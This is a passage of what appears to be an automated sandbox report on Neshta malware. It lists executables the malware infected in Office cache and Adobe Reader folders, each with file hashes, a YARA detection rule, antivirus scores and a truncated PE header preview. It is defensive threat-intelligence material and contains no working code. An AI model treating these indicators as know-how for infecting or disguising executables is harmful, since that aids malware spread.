                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCctJ77qzWk6AM2oS/xePB:sr85CctdeKzC/y
                                                                                                                        MD5:E47F8A2ECDC2D4BFBBB6328B1391F1CC
                                                                                                                        SHA1:A633C3106A89C083014FC9F29D559B70E93D6D69
                                                                                                                        SHA-256:8FCB4C541BDDA7D5CDA8124B48BECBAFBAFE2D82116BD6356D16FF894E1D83AD
                                                                                                                        SHA-512:6A9088AA04F3BC6F57AAFDAC45B3C52A0668431CA373BA6E8C034717FEE10BE90B2E7F806178A26151D040B3087F708A08219AAC3B2F4553AA5D84E36BE86EC6
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Joe Sandbox View:
                                                                                                                        • Filename: vOR0HQg11L.exe, Detection: malicious, Browse
                                                                                                                        • Filename: svchost.exe, Detection: malicious, Browse
                                                                                                                        • Filename: svchost.exe, Detection: malicious, Browse
                                                                                                                        • Filename: 2018cf61_by_Libranalysis.exe, Detection: malicious, Browse
                                                                                                                        • Filename: 41cDVt18DA.exe, Detection: malicious, Browse
                                                                                                                        • Filename: FgTUClgDjQ.exe, Detection: malicious, Browse
                                                                                                                        • Filename: ORDER-021406_pdf.jar, Detection: malicious, Browse
                                                                                                                        • Filename: TT-INVI000000000.exe, Detection: malicious, Browse
                                                                                                                        • Filename: explorer.exe, Detection: malicious, Browse
                                                                                                                        • Filename: ITEMS_LIST.exe, Detection: malicious, Browse
                                                                                                                        • Filename: DB0127718.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Itinerary.pdf.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Neshta virus.exe, Detection: malicious, Browse
                                                                                                                        • Filename: 54nwZp1aPg.exe, Detection: malicious, Browse
                                                                                                                        • Filename: qpFvMReV7S.exe, Detection: malicious, Browse
                                                                                                                        • Filename: M7oBhU5A6m.exe, Detection: malicious, Browse
                                                                                                                        • Filename: nqVQ8G1ylC.exe, Detection: malicious, Browse
                                                                                                                        • Filename: mtsendmail.exe, Detection: malicious, Browse
                                                                                                                        • Filename: mtloganalyser.exe, Detection: malicious, Browse
                                                                                                                        • Filename: contig.exe, Detection: malicious, Browse
                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.3372362912074625
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCpbQILFkbeumIkA39xSZW175V7UZQx:sr85Cp8LRkgUA1nQZs
                                                                                                                        MD5:10075707D5C79CDACFE09DEF9C6D4985
                                                                                                                        SHA1:7D1DD5FB7DBBCC8563911BDB3C40B244FD03C634
                                                                                                                        SHA-256:3D49D6B3360EB03FDD43A4C926213F8B348ABEDE3A5D8B7A4530BF8ED4AE1B72
                                                                                                                        SHA-512:C31030085A5D2C15DCE1B9B5EA1727CF36CC4F3AC71A5F5715086342669D9E3E2D0BA213ECC00D9A18D792122332BB6DF2EE05B146CA83AF279E3C4CE80B821D
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Joe Sandbox View:
                                                                                                                        • Filename: vOR0HQg11L.exe, Detection: malicious, Browse
                                                                                                                        • Filename: svchost.exe, Detection: malicious, Browse
                                                                                                                        • Filename: svchost.exe, Detection: malicious, Browse
                                                                                                                        • Filename: 2018cf61_by_Libranalysis.exe, Detection: malicious, Browse
                                                                                                                        • Filename: 41cDVt18DA.exe, Detection: malicious, Browse
                                                                                                                        • Filename: FgTUClgDjQ.exe, Detection: malicious, Browse
                                                                                                                        • Filename: ORDER-021406_pdf.jar, Detection: malicious, Browse
                                                                                                                        • Filename: TT-INVI000000000.exe, Detection: malicious, Browse
                                                                                                                        • Filename: explorer.exe, Detection: malicious, Browse
                                                                                                                        • Filename: ITEMS_LIST.exe, Detection: malicious, Browse
                                                                                                                        • Filename: DB0127718.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Itinerary.pdf.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Neshta virus.exe, Detection: malicious, Browse
                                                                                                                        • Filename: 54nwZp1aPg.exe, Detection: malicious, Browse
                                                                                                                        • Filename: qpFvMReV7S.exe, Detection: malicious, Browse
                                                                                                                        • Filename: M7oBhU5A6m.exe, Detection: malicious, Browse
                                                                                                                        • Filename: nqVQ8G1ylC.exe, Detection: malicious, Browse
                                                                                                                        • Filename: mtsendmail.exe, Detection: malicious, Browse
                                                                                                                        • Filename: mtloganalyser.exe, Detection: malicious, Browse
                                                                                                                        • Filename: contig.exe, Detection: malicious, Browse
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.220006974675465
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCbO/DiMgT0O8ahUMJD/dt7:sr85CSPm8aVJD37
                                                                                                                        MD5:F447C4B446D5889225A9D9082145AD88
                                                                                                                        SHA1:A1A380F3D3402F243E1A213C39E969D2C24CA99E
                                                                                                                        SHA-256:C34D1F919C306D2F2959C932CAC15FBED433AD465F71C50270DA27803952B829
                                                                                                                        SHA-512:E62F7E4F3E7EDE368CA0ECB242BF9AD12124AE92A61AF9BD97CA47E1457B842D84BC16105EE84EC201B948C31E613046F92DA4635EF2061638BD40EC797435AB
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.356945716242827
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC8xXHWVxZs58xP3RFA+8j/Em8kjkO:sr85CHVxZo8xP3RFA+m/Em8St
                                                                                                                        MD5:DE64003856A8B74AEAF33E247AF9424B
                                                                                                                        SHA1:912E6F9C6B1103AAFEC7F30FE3B0F9C3F55D6650
                                                                                                                        SHA-256:A39859FB4CB6693CDB686B3501C0178DFF81D27375C0086805F09ABF45284F64
                                                                                                                        SHA-512:4D2B92577F21183B5BF72DDA2DA4750099F198AA086FD68DDCCB43C686E1A8949E834E72D8E7FEAC05DA4F080D54C12BC1A7A5E2DEE36DFF3B92A4931BF1FE8D
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.486359083061706
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJw0L11g2ncA7932EDoh3hG2xS79o5kUt:JxqjQ+P04wsmJCt2ce3ExA89/I+b
                                                                                                                        MD5:D972E8BC4F221D69D9DF89999B74C311
                                                                                                                        SHA1:3A43D069389EFDBA178DCF16EBF4A45A8B09F0F9
                                                                                                                        SHA-256:8E0F471BC8BAEBB5FBC3C65A9C6C75B3F23B4E94AC4C07054DAD643CEBDCA103
                                                                                                                        SHA-512:DDA8C29088E907E0B429E560CC21FD2B5C7EF0736456A30BAA3FF08AC85C73487471E6164CE8872AFA7E7B8604AE6A5882A748140B4ADBA142EBB0CC6560E7B6
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.5232250585402545
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCdkLMxpXEZnDJussJ/ngE:sr85Cos4uBJYE
                                                                                                                        MD5:F648557D5287EC8C3677DC5B57E1C6AC
                                                                                                                        SHA1:B04F7B7273C97B1E56FD2B0BE2998D93A7327E75
                                                                                                                        SHA-256:647C4669A29D3D650AE1B750B2DDCFA312FA4AA64552C1D53867B6DDA6A72C73
                                                                                                                        SHA-512:033E2C729A89F75AD4B198A4FC7431C8763F386B5993265F2A16B0B4591CEAB88803CAF4D5952A27F074651988F1FCB09B12EA6CEC2932CD429015DE0ED0B95D
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.186107093668235
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCFhUpMPub5+G92qoooZVq/LF:sr85CTqSwgHVqDF
                                                                                                                        MD5:67059EAECEA081CE3E6426BCE980BFF0
                                                                                                                        SHA1:C1EDD7FD96E1C367A0403DD7A8DDA32AA3E13601
                                                                                                                        SHA-256:BC0FBF0B4739B4ED148D96B64308CD8815EAD686DE4400BBBA49E5B90BD7D21D
                                                                                                                        SHA-512:5E3BF07788443B558FBDBA88B41AAAA548D20697FBECF8B31F2CF1D4AC965A858100160ADAC30B7662EE2CBBFF17B3CEFA7A100623DB13C66C8735C5D70DE84E
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.667436230875162
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCi3rlNE0YMqYCka4KltvntyHi:sr85Ci7LE0YEKlhtl
                                                                                                                        MD5:E13741E87379B8A0130CCB0F24B56D1E
                                                                                                                        SHA1:C1DF66670A0370F44E9F7BE15FCB60C580992D1F
                                                                                                                        SHA-256:CEDC7E901AA1E9FF96BA749A3239542AD29F62B1C08EA392B721CD28D0D298C8
                                                                                                                        SHA-512:F299C2732A09B5C7870CB9AAF5CAFDFD3DC41A0B81C6102B53962A1E3EA4A2BBC12C20FB788849612B6FEEA2B9571A2BA28A748FAE32BA58281A3C3203177110
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.461209967778202
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCl8H777b4o4yre0zlbTzqYOeg9lZdKMOZo2:sr85Cl8Hn7b4o4kbT93Kxj2
                                                                                                                        MD5:72EC370FCAB5AC9E14C7DE1B93C0B954
                                                                                                                        SHA1:B2216AE2B03F902878D852F9D52FFA704C76F61F
                                                                                                                        SHA-256:DB205349D14EA35D6081598FBDE492AB12BEF4A39555EB9B4F4020C5B492E039
                                                                                                                        SHA-512:6046A04E192C329D56FBC11118269DEEA06053D6C0C41FF5E6225938476B54969A03345D3B46F84B54D7B5262230584218466651E7B4ADDAA0E642AF3CF4F6F2
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.302303877870808
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCeJ8cSLgpA3hKwYPRvGdIab:sr85CncSLgpG88b
                                                                                                                        MD5:B41F70A22F31E1DA8FF057AD47499F3E
                                                                                                                        SHA1:15918D00F2C8DE480C4D3749D5317468C1B14DA0
                                                                                                                        SHA-256:8860EEA648A0CD39281639D27B1B9C981568ACEE9C3DBABDC5D862534F70946E
                                                                                                                        SHA-512:5F0C77A4842BA7FC53CECA4F641FA906EA0D26652876406B52158DC6BC3D36ADCC3A63E6FDA5B226073320ED301A21A6AFC87B930ED4D5B91058172727AB47A4
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.261294291615621
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCmwGqE9qLa7QoIG5fIIXBB8C:sr85CaqcVz5fzsC
                                                                                                                        MD5:F25F4BF1D71532CE97C90BEEC7A56FBC
                                                                                                                        SHA1:337C45D81469B760EB7ADA0316AFC262FE4C3721
                                                                                                                        SHA-256:B24831A423AFFF5E65032A7673D7BA4E35192C43C365FCDE75D678CAF4605F33
                                                                                                                        SHA-512:5AEDA5CCD0F38392FEF3F14AD49EAC63D03ECBFDDC89D326DFE0ED03A225A1E7496B02D5F983168D1D7C96448F90718B6975A8D58EAAA6DF9626C27D4AF96DAC
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        • Antivirus: ReversingLabs, Detection: 97%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.423139673646388
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCULKBHLLkRkjuXi65D5mFv1:sr85CU0LFjAiGI
                                                                                                                        MD5:C4CA362C5EF952BAF96EF61B59D8355D
                                                                                                                        SHA1:5DEB0DAE7262FF31BD9B2C2205D55D2E5D012CEF
                                                                                                                        SHA-256:A679F4131244485FD10E274A510C2B76DF545838B8562E579C9805269834355E
                                                                                                                        SHA-512:49261B804AB74A90DCE657FD7C4FE87F42505F673847C143C42A4CF89E2BF3226C329630ECCBF19FB584071FC4E7DAFFA7725F66A7E7936DC8CDF4A3E73425E3
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        • Antivirus: ReversingLabs, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.355719905315724
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCdjrXDyO4zkm8dbHVLokF8iJTwRH0n:sr85CVrMzkm8PL3Eo
                                                                                                                        MD5:A42467B5C21814776277B4CE3456D716
                                                                                                                        SHA1:B01DD2412ADA123EF3D6317F839826D37C6A27D4
                                                                                                                        SHA-256:B1A5063A32CB8AFD591C57AAB1A679137EE29A886AF77849A13C26537A100AD9
                                                                                                                        SHA-512:62D2AECABE4892E0E25A9787A28898EC989A4AA54A66CDB7DE65EB48A8634E0274EB6515722EA1FA580C848E1AD683C75CE26F6AB7D7F7E48A5DD064DD1B3A24
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        • Antivirus: Metadefender, Detection: 91%, Browse
                                                                                                                        • Antivirus: ReversingLabs, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.228109838185618
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC3uireklhKsikOkCWfNU:sr85C+ilU9xL
                                                                                                                        MD5:B9A06C8C07B4BC86001ABCA5835AEED2
                                                                                                                        SHA1:5EA2F32AD6F1642498CDE9F8CA74D8A70DE376E0
                                                                                                                        SHA-256:1531CA6AD23335F3F93231D153CB9DDEE40580A5A82D502AD6F7B54C8328D8B4
                                                                                                                        SHA-512:79C9F72832E53AED9E50C680F0146E6F971D77299E192DD61500E8B91117E19373C7EC92B84A31B2934FD65CD6090E9613BC6F62A2337A1313E7E52A1041B04E
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.26326337462311
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCFbIJyoI91593nKMd/VHT:sr85CFboI9133K+HT
                                                                                                                        MD5:7C2E8C0527C5CFF276FB2FFA314D455A
                                                                                                                        SHA1:6B6FD014B9C295838E0F1F2D563C185A0004C028
                                                                                                                        SHA-256:41AEBB2A2B6175595684D20DF5F7B8AB8FEB2B5662530F6593287F9F72777296
                                                                                                                        SHA-512:2138731F6006CB6DF13821E05DC16EDEBF7F70777906AB03271707A1237DBFD8859ED43795F36A87901D63BDAA4CC738E46B9D2D0D6361546FD64A2AE56EB65F
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
